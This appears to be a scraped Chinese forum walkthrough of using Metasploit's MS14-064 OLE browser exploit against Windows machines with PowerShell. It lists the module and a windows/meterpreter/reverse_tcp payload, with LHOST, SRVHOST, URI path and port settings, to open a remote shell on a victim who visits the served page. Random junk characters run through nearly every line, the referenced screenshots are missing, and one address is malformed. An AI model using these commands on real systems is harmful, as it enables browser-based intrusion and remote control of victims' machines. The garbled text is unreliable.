1 w7 A- O% R% ?' ~; y5 F
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示3 e& s% c. v& U/ x6 G" @2 Q8 x2 |
1 i/ T6 C( S* Q" m& [; ]5 v( L8 w$ @( }
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
7 _9 O- r& W6 M6 A! i& N* `
, W0 M2 l- u, y* ?( a. F& j P
/ j/ ? F7 R0 q# N
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
& m) R4 j P( [% K% ^7 r1 k
# k5 H7 ]6 H; T# y
- `: R- d+ C( Y4 z& m, g' p3 r. U+ l
set AllowPowershellPrompt true
/ D q) a$ M1 Y/ u; o4 G+ ?
7 R2 [* _# \9 N. Q+ u' V b
. V7 u8 q( _1 ]5 ~ Set LHOST 192.168.0.109
3 I9 E- g" k$ Y6 V4 Z7 U& P
4 K* v/ @5 `* p
+ K8 W. P% `6 c- ]/ m5 G3 a4 K& Y9 D set SRVHOST 192.168.0.1090 h3 \: d7 z( O: c, l7 s
- [3 i) C. ~3 A9 }+ h
. q2 L* z9 Y6 d1 \ Set uripath share( v" ~6 Z/ B# @9 N
4 t+ D4 s n; l6 [7 p p
' f/ n* c1 `' \( ]& t8 d2 q. X \7 Y, e
Set srvport 80
% O& Y3 F) y( Y0 q6 p. T6 l
0 v5 T0 m* O1 r8 P
" c) Z1 v+ W/ r) j& P
# S( i! R# X8 w6 i$ l
& O% N/ t @# {2 F4 z6 d( X
- i5 |7 R: ?) v6 ^3 f: E8 o 7 _, U% l; p. X
7 e9 @* X% ]) u4 J# r5 x2 q0 n; d9 W9 {4 j
: O- w! E3 m$ o" T( o
. N) {7 i2 ~& n6 i# K/ ?, O5 y
: X0 e; S8 h! l3 ~1 b/ U - X0 X {) B/ S3 L8 O
" l7 |$ e: H" S$ E l5 y7 G* D- Y* d* c) t( `$ r
+ i* r3 R8 j( l0 G% B G
3 W7 ]: @+ Z* p& @* b& H
/ s# g7 P$ b; K) I 下面我们来访问本地地址如图:* V& V1 ` k& u6 x. J) w# C$ ?
/ o) h; H- K# M5 M
% f0 G; a* A% u" E; U% F9 q( V
- ~% G5 \, h3 A3 m- P7 ]* ~
9 U' _3 X7 i6 n" R7 A( F G. R% B9 x
2 s5 A, q, C% |
$ b+ h- i) A; f) p; G, m
* M, Y& ~) i" b+ Z! `- D
/ q0 z& ~% z* }$ A
0 R6 k0 I$ {9 G( Z; }